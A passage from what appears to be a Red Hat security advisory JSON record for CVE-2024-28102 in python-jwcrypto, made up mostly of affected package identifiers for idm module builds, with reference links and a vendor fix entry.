"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
